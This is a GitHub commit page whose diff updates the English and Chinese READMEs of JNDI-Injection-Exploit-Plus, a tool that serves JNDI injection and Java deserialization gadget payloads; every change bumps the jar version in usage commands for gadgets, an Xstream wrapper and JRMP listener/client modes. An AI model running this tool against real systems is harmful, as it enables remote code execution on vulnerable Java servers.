Skip to content

Commit b87b886

Browse files
cckuailongcckuailong
committed
update README
1 parent f1c30c1 commit b87b886

File tree

2 files changed

+16
-16
lines changed

2 files changed

+16
-16
lines changed

README.md

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -113,15 +113,15 @@ Xstream | CVE-2021-39149
113113
- Example
114114

115115
```shell
116-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
116+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
117117
```
118118

119119
![](./img/4.png)
120120

121121
#### Web service to return Deserial Gadgets
122122

123123
```shell
124-
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar
124+
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
125125
```
126126

127127
```shell
@@ -141,7 +141,7 @@ P.S. Param wrapper & output is opetional
141141
Run as
142142

143143
```shell
144-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A] [address]
144+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
145145
```
146146

147147
where:
@@ -171,7 +171,7 @@ Points for attention:
171171
Run as
172172

173173
```shell
174-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
174+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
175175
```
176176

177177
where:
@@ -189,13 +189,13 @@ where:
189189
- JRMPListener
190190

191191
```shell
192-
java -cp JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
192+
java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
193193
```
194194

195195
- JRMPClient
196196

197197
```shell
198-
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
198+
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
199199
```
200200

201201
## Examples
@@ -207,7 +207,7 @@ Local demo:
207207
1. Start the tool like this:
208208

209209
```shell
210-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
210+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
211211
```
212212

213213
Screenshot:
@@ -238,7 +238,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
238238
### Deserialization Payloads
239239

240240
```shell
241-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
241+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
242242
```
243243

244244
Base64 Output Result:

README_zh.md

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ P.S. 具体利用链名称及依赖见 [表格](./README.md)
1919
#### 使用方法
2020

2121
```
22-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A] [address]
22+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
2323
```
2424

2525
#### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A]
3939
1. 运行工具
4040

4141
```
42-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
42+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
4343
```
4444

4545
![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
6464
#### 使用方法
6565

6666
```
67-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
67+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
6868
```
6969

7070
#### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D]
8484
1. 普通
8585

8686
```
87-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
87+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
8888
```
8989

9090
![](./img/3.png)
@@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applica
9393

9494
- JRMPListener
9595
```
96-
java -cp JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
96+
java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
9797
```
9898

9999
- JRMPClient
100100
```
101-
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
101+
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
102102
```
103103

104104
#### 提供反序列化包装器
@@ -110,15 +110,15 @@ Xstream | CVE-2021-39149
110110
- 示例
111111

112112
```shell
113-
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
113+
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
114114
```
115115

116116
![](./img/4.png)
117117

118118
#### 可以返回反序列化数据的web服务
119119

120120
```shell
121-
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar
121+
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
122122
```
123123

124124
```shell

0 commit comments

Comments
 (0)